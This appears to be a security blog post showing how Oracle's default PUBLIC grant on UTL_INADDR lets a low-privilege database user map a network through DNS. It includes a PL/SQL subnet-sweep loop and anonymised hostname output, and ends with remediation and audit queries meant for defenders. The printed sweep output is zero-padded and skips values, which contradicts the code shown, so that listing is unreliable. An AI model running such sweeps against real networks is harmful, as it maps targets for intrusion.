Overview
An Oracle Database hasn't been a "database" since version 6 or 7, depending on your point of view.
It was back in the days when dinosaurs still roamed the earth, mainframe people like some of us here, that Oracle began adding value to what had previously been only a database and turning it into a rich,
fully functional application development and hosting platform. One of those additions is a built-in PL/SQL package named UTL_INADDR that can be used to interrogate both internal and external DNS resources to identify targets to attack.
What makes UTL_INADDR uniquely dangerous is that it is already installed inside the most secure zone of your firewall and is a trusted resource.
Adding to that trusted ownership and location is the fact that, by default, Oracle grants EXECUTE on this package to PUBLIC. To execute the demo on this page no privilege is required beyond CREATE SESSION, which is the lowest-level privilege within the database.
When an internal database call is made, it will appear to most monitoring applications as having been made by the operating-system account that owns the database software, "oracle", not by the person executing the action.
And, given the lack of knowledge about databases on security teams, why would a call to UTL_INADDR cause anyone to even look up? After all, they are monitoring for SQL injection attacks or other activities they are familiar with.
The demo is best viewed as a case where any user that has a valid userid and password can connect to the database with a command-line tool.
Finally, if you are concerned as you review this posting that "real" information was published on this website, don't be.
The information has been altered in a manner that fully protects the organizations, and we have received their permission to publish it in this form.
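The monitoring gap described above can be closed on the database side, where the caller is still known. The following is an added example, not code from the original post: a unified audit policy that records every call to SYS.UTL_INADDR with the database user, OS user, client host and program that made it. The policy name INADDR_USE_POL and the threshold of 50 lookups per minute are our choices; it assumes a 12c-or-later database with unified auditing available and is run by a user with AUDIT_ADMIN.

```sql
-- Added example (not from the original post). Audit every execution of
-- the package, regardless of who calls it or whether it succeeds: a
-- successful lookup is exactly the event of interest.
CREATE AUDIT POLICY inaddr_use_pol
  ACTIONS EXECUTE ON sys.utl_inaddr;

AUDIT POLICY inaddr_use_pol;

-- What the security team can now see: who, from where, with what tool,
-- and the SQL text that drove the lookup. Unlike the network trace, the
-- record is attributed to the database user, not to "oracle".
SELECT event_timestamp,
       dbusername,
       os_username,
       userhost,
       client_program_name,
       sql_text
  FROM unified_audit_trail
 WHERE unified_audit_policies LIKE '%INADDR_USE_POL%'
 ORDER BY event_timestamp;

-- Rate view: an application resolves a handful of names; a session that
-- resolves dozens of addresses in a single minute is sweeping a subnet,
-- which is the pattern the PL/SQL loop in the demo produces.
SELECT dbusername,
       sessionid,
       TRUNC(event_timestamp, 'MI') AS minute,
       COUNT(*)                     AS lookups
  FROM unified_audit_trail
 WHERE object_schema = 'SYS'
   AND object_name   = 'UTL_INADDR'
 GROUP BY dbusername, sessionid, TRUNC(event_timestamp, 'MI')
HAVING COUNT(*) > 50   -- threshold is a constructed starting point; tune it
 ORDER BY lookups DESC;
```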
Exploit Demo
Let's start by creating a database user with the least possible privilege: CREATE SESSION.
SQL> conn / as sysdba
Connected.
SQL> CREATE user c##abc IDENTIFIED BY abc;
User Created.
SQL> GRANT create session TO c##abc;
Grant succeeded.
Now let's look at what this essentially unprivileged user can access.
SQL> conn c##abc/abc
Connected.
SQL> SELECT object_type, COUNT(*)
2 FROM all_objects
3 GROUP BY object_type
4 ORDER BY 1;
OBJECT_TYPE COUNT(*)
------------------- --------
CONSUMER GROUP 2
DESTINATION 2
EDITION 1
EVALUATION CONTEXT 1
FUNCTION 269
INDEX 111
INDEXTYPE 11
JAVA CLASS 37436
JAVA RESOURCE 1715
JOB CLASS 2
LOCKDOWN PROFILE 3
OPERATOR 59
PACKAGE 414
PROCEDURE 27
PROGRAM 1
SCHEDULE 4
SCHEDULER GROUP 4
SEQUENCE 10
SYNONYM 12121
TABLE 133
TABLE PARTITION 1
TYPE 1864
VIEW 1951
WINDOW 9
XML SCHEMA 43
In my current Oracle 18.3 database my totally unprivileged user gains some form of access to more than 56,000 objects.
This is, by definition, minimum privileges ... access to 37,436 Java classes ... what could possibly go wrong?
But we need to focus on the 414 packages, because they are very powerful and many are well documented.
And, as you can see below, our new user has access because the EXECUTE privilege is granted, at install, to PUBLIC.
SQL> SELECT owner, object_type
2 FROM all_objects
3 WHERE object_name = 'UTL_INADDR';
OWNER OBJECT_TYPE
------ ------------
SYS PACKAGE
PUBLIC SYNONYM
SQL> SELECT grantee, privilege
2 FROM all_tab_privs
3 WHERE table_name = 'UTL_INADDR';
GRANTEE PRIVILEGE
-------- ----------
PUBLIC EXECUTE
The following demonstration, performed on the public internet, shows how dangerous this capability can be
if deployed from an Oracle Database that is inside your firewall and has access to NTP, DNS, network devices,
storage arrays, application servers, and probably a large number of other database servers.
For this demo to work you should be connected to the internet with a wireless connection (because we don't
want you to lose your job doing it from inside your organization's network). The demo also assumes that its target
has not moved to IPv6 addressing and has not tightened its security (they were notified over a year ago).
SQL> show user
USER is "ABC"
SQL> SELECT utl_inaddr.get_host_address('www.xyz.com') FROM dual;
UTL_INADDR.GET_HOST_ADDRESS('WWW.XYZ.COM')
-------------------------------------------
127.84.159.77
We now have the IP address of a server. Let's turn it into a server name.
SQL> SELECT utl_inaddr.get_host_name('127.84.159.77') FROM dual;
UTL_INADDR.GET_HOST_NAME('127.84.159.77')
------------------------------------------
www-v.oit.xyz.com
And with a few lines of PL/SQL we can check every related IP address between .1 and .255.
SET SERVEROUTPUT ON
DECLARE
  h_name  VARCHAR2(255);                 -- a full DNS name can be up to 255 characters
  test_ip VARCHAR2(12) := '127.84.159.'; -- the /24 learned from the forward lookup above
BEGIN
  FOR i IN 1 .. 255 LOOP
    BEGIN
      -- The last octet is not zero-padded: if the resolver reads a leading
      -- zero as octal, '010' looks up .8 instead of .10 and .64 through .99
      -- are never checked at all.
      SELECT utl_inaddr.get_host_name(test_ip || TO_CHAR(i))
        INTO h_name
        FROM dual;
      dbms_output.put_line(test_ip || TO_CHAR(i) || ' - ' || h_name);
    EXCEPTION
      WHEN OTHERS THEN
        NULL;   -- no PTR record for this address (ORA-29257); skip it
    END;
  END LOOP;
END;
/
This generates the following output:
127.84.159.001 - cms.csom.xyz.com
127.84.159.002 - www.lib.xyz.com
127.84.159.003 - axway-outbound-proxy.oit.xyz.com
127.84.159.004 - futuregopher.xyz.com
127.84.159.005 - wwwstage.lib.xyz.com
127.84.159.006 - kronos-p.oit.xyz.com
127.84.159.007 - entkronos.oit.xyz.com
127.84.159.010 - ldap-v.oit.xyz.com
127.84.159.011 - ldapauth-v.oit.xyz.com
127.84.159.012 - appd-cap-tst.oit.xyz.com
127.84.159.013 - ttus.oit.xyz.com
127.84.159.014 - idp3-test-v.shib.xyz.com
127.84.159.015 - prd.cap.oit.xyz.com
127.84.159.016 - qa.cap.oit.xyz.com
127.84.159.017 - wwwgoldpass.oit.xyz.com
127.84.159.020 - www-temp.tc.xyz.com
127.84.159.021 - tst.delegations.xyz.com
127.84.159.022 - oit-oim-web-lb.micah.oit.xyz.com
127.84.159.023 - edw.oit.xyz.com
127.84.159.024 - uachievetfo-dev.oit.xyz.com
127.84.159.025 - 2019.umcf.xyz.com
127.84.159.026 - oit-lbc-ltmatt-750.oit.xyz.com
127.84.159.027 - prd.delegations.xyz.com
127.84.159.030 - bionet.oit.xyz.com
127.84.159.031 - finance.oit.xyz.com
127.84.159.032 - tfraportal.uservices.xyz.com
127.84.159.033 - ltmmgd-outbound-proxy-snat.oit.xyz.com
127.84.159.034 - lb-f5-vs1.oit.xyz.com
127.84.159.035 - engage-test.oit.xyz.com
127.84.159.036 - cehdvision2020-web.oit.xyz.com
127.84.159.037 - conner.xyz.com
127.84.159.040 - pds.oit.xyz.com
127.84.159.041 - plan.oit.xyz.com
127.84.159.042 - wwwplan.oit.xyz.com
127.84.159.043 - search-assets.xyz.com
127.84.159.044 - prepaid.oit.xyz.com
127.84.159.045 - mncamh.oit.xyz.com
127.84.159.046 - lpt-testing.oit.xyz.com
127.84.159.047 - umedia-new-lib.oit.xyz.com
127.84.159.050 - wwwdem.oit.xyz.com
127.84.159.051 - umreports-lb.oit.xyz.com
127.84.159.052 - mkey.oit.xyz.com
127.84.159.053 - google-lb.oit.xyz.com
127.84.159.054 - prod-umreports-old.oit.xyz.com
127.84.159.055 - 2016test.umreports.xyz.com
127.84.159.056 - oit-lbw-ltmauth-750.oit.xyz.com
127.84.159.057 - prod-umreports.oit.xyz.com
127.84.159.060 - csi.dev.psoft.xyz.com
127.84.159.061 - controller.oit.xyz.com
127.84.159.062 - designcenter-new.oit.xyz.com
127.84.159.063 - wwwhhh.oit.xyz.com
127.84.159.064 - hhh.oit.xyz.com
127.84.159.065 - scholarship.oit.xyz.com
127.84.159.066 - scholarship-test.oit.xyz.com
127.84.159.067 - gis.uspatial.uservices.xyz.com
127.84.159.070 - smtp.oit.xyz.com
127.84.159.071 - epro-qat-old.eresearch.xyz.com
127.84.159.072 - designhigh-new.oit.xyz.com
127.84.159.073 - design-n-new.oit.xyz.com
127.84.159.074 - travel.oit.xyz.com
127.84.159.075 - design-n.oit.xyz.com
127.84.159.076 - oib.oit.xyz.com
127.84.159.077 - dha-c-new.oit.xyz.com
127.84.159.100 - oit-lb-ltmauth-750-float.oit.xyz.com
127.84.159.101 - egms-ent2.oit.xyz.com
127.84.159.102 - hokanson-new.oit.xyz.com
127.84.159.103 - gopherpoints.oit.xyz.com
127.84.159.104 - trakbook.oit.xyz.com
127.84.159.105 - ay15.tst.moodle.oit.xyz.com
127.84.159.106 - work.csom.xyz.com
127.84.159.107 - oit-lb-ltmtest-750-float.oit.xyz.com
127.84.159.108 - finsys.oit.xyz.com
127.84.159.109 - media2.law.oit.xyz.com
127.84.159.110 - rrc.oit.xyz.com
127.84.159.111 - egms-tst2.oit.xyz.com
127.84.159.112 - wwwtest.oit.xyz.com
127.84.159.113 - www.oit.xyz.com
127.84.159.114 - oit-lb.oit.xyz.com
127.84.159.115 - uachievetfo-qat.oit.xyz.com
127.84.159.116 - ay15.moodle.xyz.com
127.84.159.117 - netfiles-tst.oit.xyz.com
127.84.159.118 - stem-projects.oit.xyz.com
127.84.159.119 - search-lb.oit.xyz.com
127.84.159.120 - humanfactors-new.oit.xyz.com
127.84.159.121 - mediahub-test.oit.xyz.com
127.84.159.122 - identity-new.oit.xyz.com
127.84.159.123 - mediahub.oit.xyz.com
127.84.159.124 - landarch-c-new.oit.xyz.com
127.84.159.125 - ccc-test.oit.xyz.com
127.84.159.126 - oit-lb-ltmatt-750-float.oit.xyz.com
127.84.159.127 - tfauth-ldap-v.oit.xyz.com
127.84.159.128 - prd.eresearch.xyz.com
127.84.159.127 - ps-proxy.oit.xyz.com
127.84.159.130 - prdegms.oit.xyz.com
127.84.159.131 - oncoretraining.oit.xyz.com
127.84.159.132 - a.oit.xyz.com
127.84.159.133 - ecrt-tst.eresearch.xyz.com
127.84.159.127 - ecrt-ent.eresearch.xyz.com
127.84.159.135 - cle-test.oit.xyz.com
127.84.159.136 - ecrt-trn.eresearch.xyz.com
127.84.159.137 - webapps-prd.oit.xyz.com
127.84.159.138 - landarch-n-new.oit.xyz.com
127.84.159.139 - fmresident-database.oit.xyz.com
127.84.159.140 - systemstatus.oit.xyz.com
127.84.159.141 - portcities-new.oit.xyz.com
127.84.159.142 - rp-new.oit.xyz.com
127.84.159.143 - shift-new.oit.xyz.com
127.84.159.144 - scep-test.oit.xyz.com
127.84.159.145 - stage2-new.oit.xyz.com
127.84.159.146 - it.oit.xyz.com
127.84.159.147 - x500test-v-lb.oit.xyz.com
127.84.159.148 - tpdbcrest.oit.xyz.com
127.84.159.149 - wwwtest-v-lb.oit.xyz.com
127.84.159.150 - cle.oit.xyz.com
127.84.159.151 - gis.uservices.xyz.com
127.84.159.152 - pharmd.oit.xyz.com
127.84.159.153 - uachievetfo-tst.oit.xyz.com
127.84.159.154 - worldheritage-c-new.oit.xyz.com
127.84.159.155 - fsi.tst.psoft.xyz.com
127.84.159.156 - csi.tst.psoft.xyz.com
127.84.159.157 - cle-new.oit.xyz.com
127.84.159.158 - umarket.xyz.com
127.84.159.159 - ici-docker-dev.oit.xyz.com
127.84.159.160 - shib-load-f5.oit.xyz.com
127.84.159.161 - egms-prd2.oit.xyz.com
127.84.159.162 - ftp-proxy-tkunz.oit.xyz.com
127.84.159.163 - oit-jsstest.oit.xyz.com
127.84.159.164 - ihcg-myu.oit.xyz.com
127.84.159.165 - envoy-old.oit.xyz.com
127.84.159.166 - stacks.oit.xyz.com
127.84.159.167 - canvas-lti-prd.oit.xyz.com
127.84.159.168 - cs-myu.oit.xyz.com
127.84.159.169 - dwtst.xyz.com
127.84.159.170 - appd-cap-dev-green.oit.xyz.com
127.84.159.171 - sirc-ent.eresearch.xyz.com
127.84.159.172 - ay16.qa.moodle.oit.xyz.com
127.84.159.173 - shib-prod-v.oit.xyz.com
127.84.159.174 - oit-oim-web-lb2.oit.xyz.com
127.84.159.175 - public-umanalytics.xyz.com
127.84.159.176 - ici-docker-prd.oit.xyz.com
127.84.159.177 - umanalytics.oit.xyz.com
127.84.159.178 - ccc.oit.xyz.com
127.84.159.179 - apps.lib.xyz.com
127.84.159.180 - fs-myu.oit.xyz.com
127.84.159.181 - hr-myu.oit.xyz.com
127.84.159.182 - esup-myu.oit.xyz.com
127.84.159.183 - umaps.oit.xyz.com
127.84.159.184 - hri.dev.psoft.xyz.com
127.84.159.185 - zoom.xyz.com
127.84.159.186 - studentserv.oit.xyz.com
127.84.159.187 - tst.cap.oit.xyz.com
127.84.159.188 - pilot.cap.oit.xyz.com
127.84.159.189 - itprem.oit.xyz.com
127.84.159.190 - appd-cap-prd.oit.xyz.com
127.84.159.191 - csi-qat-psoft.oit.xyz.com
127.84.159.192 - fsi-qat-psoft.oit.xyz.com
127.84.159.193 - hri.tst.psoft.xyz.com
127.84.159.194 - ay14.moodle.xyz.com
127.84.159.195 - hri.qat.psoft.xyz.com
127.84.159.196 - whost.oit.xyz.com
127.84.159.197 - whost2.oit.xyz.com
127.84.159.198 - whost3.oit.xyz.com
127.84.159.199 - gmail-dev.oit.xyz.com
127.84.159.200 - gmail-test.oit.xyz.com
127.84.159.201 - glogin-dev.oit.xyz.com
127.84.159.202 - glogin-test.oit.xyz.com
127.84.159.203 - test.statefair.oit.xyz.com
127.84.159.204 - devel.meded.oit.xyz.com
127.84.159.205 - eprotocol.oit.xyz.com
127.84.159.206 - gmail-prod.oit.xyz.com
127.84.159.207 - glogin-prod.oit.xyz.com
127.84.159.208 - design-n-test.oit.xyz.com
127.84.159.209 - excellence.oit.xyz.com
127.84.159.210 - oit-lbw-ltmatt-750.oit.xyz.com
127.84.159.211 - private.zoom.xyz.com
127.84.159.212 - ctrl-test.oit.xyz.com
127.84.159.213 - test.search-lb.oit.xyz.com
127.84.159.214 - dmc.xyz.com
127.84.159.215 - umedia-new.oit.xyz.com
127.84.159.216 - dev-old-orig.oim.xyz.com
127.84.159.217 - appd-cap-dev.oit.xyz.com
127.84.159.218 - trn.ras.oit.xyz.com
127.84.159.219 - ay16.tst.moodle.oit.xyz.com
127.84.159.220 - test.m.oit.xyz.com
127.84.159.221 - admissions-new.tc.xyz.com
127.84.159.222 - oit-lbw-ltmps-750.oit.xyz.com
127.84.159.223 - oit-lbc-ltmps-750.oit.xyz.com
127.84.159.224 - oit-lb-ltmps-750-float.oit.xyz.com
127.84.159.225 - oit-lbw-ltmmgd-750.oit.xyz.com
127.84.159.226 - oit-lbc-ltmmgd-750.oit.xyz.com
127.84.159.227 - oit-lb-ltmmgd-750-float.oit.xyz.com
127.84.159.228 - x-127-84-159-228.oit.xyz.com
127.84.159.229 - oit-splunk-prd-shc-lb.oit.xyz.com
127.84.159.230 - x-127-84-159-230.oit.xyz.com
127.84.159.231 - x-127-84-159-231.oit.xyz.com
127.84.159.232 - x-127-84-159-232.oit.xyz.com
127.84.159.233 - x-127-84-159-233.oit.xyz.com
127.84.159.234 - x-127-84-159-234.oit.xyz.com
127.84.159.235 - moodle2-lb.oit.xyz.com
127.84.159.236 - myu-lb.oit.xyz.com
127.84.159.237 - netfiles-lb.oit.xyz.com
127.84.159.238 - electrophysworkgroup.oit.xyz.com
127.84.159.239 - myu-test.oit.xyz.com
127.84.159.240 - ay13.moodle.xyz.com
127.84.159.241 - boxoffice-lb.oit.xyz.com
127.84.159.242 - avstage-lb.oit.xyz.com
127.84.159.243 - avreports-lb.oit.xyz.com
127.84.159.244 - avtest-lb.oit.xyz.com
127.84.159.245 - minnesotamasternaturalist.oit.xyz.com
127.84.159.246 - pay.oit.xyz.com
127.84.159.247 - cal-prod.oit.xyz.com
127.84.159.248 - dlp-reader-test.oit.xyz.com
127.84.159.249 - grouper-v.oit.xyz.com
127.84.159.250 - dgis.uservices.xyz.com
127.84.159.251 - dlp-reader-ssl.oit.xyz.com
127.84.159.252 - infotech-dc-01-v750.ggnet.xyz.com
127.84.159.253 - telecomb-dc-01-v750.ggnet.xyz.com
127.84.159.254 - datacenter-dc-01-v750.ggnet.xyz.com
How much would you have learned about this organization if you were an attacker?
And we only highlighted a few of those that are problematic.
Not a single one of these needed to be exposed to the internet to be fully functional.
And we will gladly accept bets on whether all of the PSOFT servers are running PeopleSoft Financials or HR.
Again, what is your risk if this capability were utilized from behind your firewall?
Here is a short list of some of the worst naming we have seen while teaching organizations how to protect themselves,
along with our guesses as to what they host.
127.76.032.052 - blv-sec-cert-rp.abcd.com - Bellevue data center security certifications
127.76.032.075 - dhcp17a.bcde.com - DHCP server
127.76.032.103 - bcag-fwal-01.cdef.com - Firewall
127.76.184.106 - phxntpx1.ntp.defg.net - Phoenix data center NTP server
... with a copper wire to everything
127.76.184.212 - phxdnsxp01.dns.ghij.net - Phoenix data center DNS server
... with a copper wire to everything
127.84.119.025 - g-smtp-w.tc.xyz.edu - SMTP
127.84.119.036 - ldapauth-w.tc.xyz.com - LDAP
... with a copper wire to almost everything
127.97.136.111 - sql-om.it.rstu.edu - SQL Server database
... it contained both PII and PHI
127.97.137.106 - people.mnop.com - PII information
127.97.137.104 - jira.sys.qrst.net - Support tickets
... containing systems with bugs and credentials
127.97.137.150 - umailx.umail.uvwh.org - Email
Our guesses may be wrong ... but if we were contractors or vendors about to go onsite, this information could save a lot of time identifying targets.
There is no excuse for making it this easy for the bad guys.
Oracle Database Remediation
SQL> conn / as sysdba
Connected.
SQL> REVOKE execute ON utl_inaddr FROM PUBLIC;
That is all it takes to eliminate this threat originating from an Oracle Database.
If you need UTL_INADDR for an application ... explicitly grant EXECUTE to that schema.
If you are terrified by the thought of revoking a grant from PUBLIC, follow Oracle's instructions on creating a Network Access Control List.
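The remediation carried through end to end, as an added example that is not the post's own code: the revoke, a check that PUBLIC no longer holds the privilege, and the least-privilege replacement of a direct grant plus a network ACL that lets only one application schema resolve names. APP_OWNER is a placeholder schema name; the ACL call is the 12c-and-later DBMS_NETWORK_ACL_ADMIN.APPEND_HOST_ACE form, run as SYSDBA.

```sql
-- Added example (not from the original post).
REVOKE EXECUTE ON sys.utl_inaddr FROM PUBLIC;

-- Confirm the revoke took: there should be no PUBLIC row left.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'UTL_INADDR';

-- Only the schema that genuinely needs name resolution gets it back,
-- as an explicit grant that shows up in the query above with a name
-- someone is accountable for.
GRANT EXECUTE ON sys.utl_inaddr TO app_owner;   -- APP_OWNER is a placeholder

-- Network ACL: the 'resolve' privilege governs GET_HOST_ADDRESS and
-- GET_HOST_NAME. host => '*' permits any name; narrow it to the hosts
-- the application actually talks to where you can, since a wildcard
-- still lets that one schema sweep a subnet the way the demo did.
BEGIN
  DBMS_NETWORK_ACL_ADMIN.APPEND_HOST_ACE(
    host => '*',
    ace  => xs$ace_type(privilege_list => xs$name_list('resolve'),
                        principal_name => 'APP_OWNER',
                        principal_type => xs_acl.ptype_db));
END;
/

-- Who can resolve what, after the change. Anything other than the
-- application schema (or a PUBLIC principal) is a finding.
SELECT host, principal, principal_type, privilege, grant_type
  FROM dba_host_aces
 WHERE privilege = 'RESOLVE'
 ORDER BY host, principal;
```

A user left with only CREATE SESSION, like c##abc in the demo, now fails at the EXECUTE grant before the ACL is ever consulted; the ACL is the second layer for the schemas that do hold the grant.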
Conclusion
Oracle has a reason for not revoking the grant to PUBLIC: backward compatibility.
Organizations that continue to name servers based on their location and functionality, and, even worse, expose that information to the internet, have no mitigating factors. Doing so is a demonstration of a lack of thought about security.
There were a number of separate issues exposed by this exploit.
- Naming servers in a way that betrays their location and/or functionality
- Exposing internal physical servers to the Internet, which persists their name and address in core DNS
- Not creating appropriate rules in their firewalls
- Not revoking unnecessary grants of EXECUTE to PUBLIC in the Oracle Database
- Not creating an appropriate Network Access Control list in the database to block internet access
If you are an Oracle customer and have now become aware of this threat, what action are you going to take to eliminate it from your environment?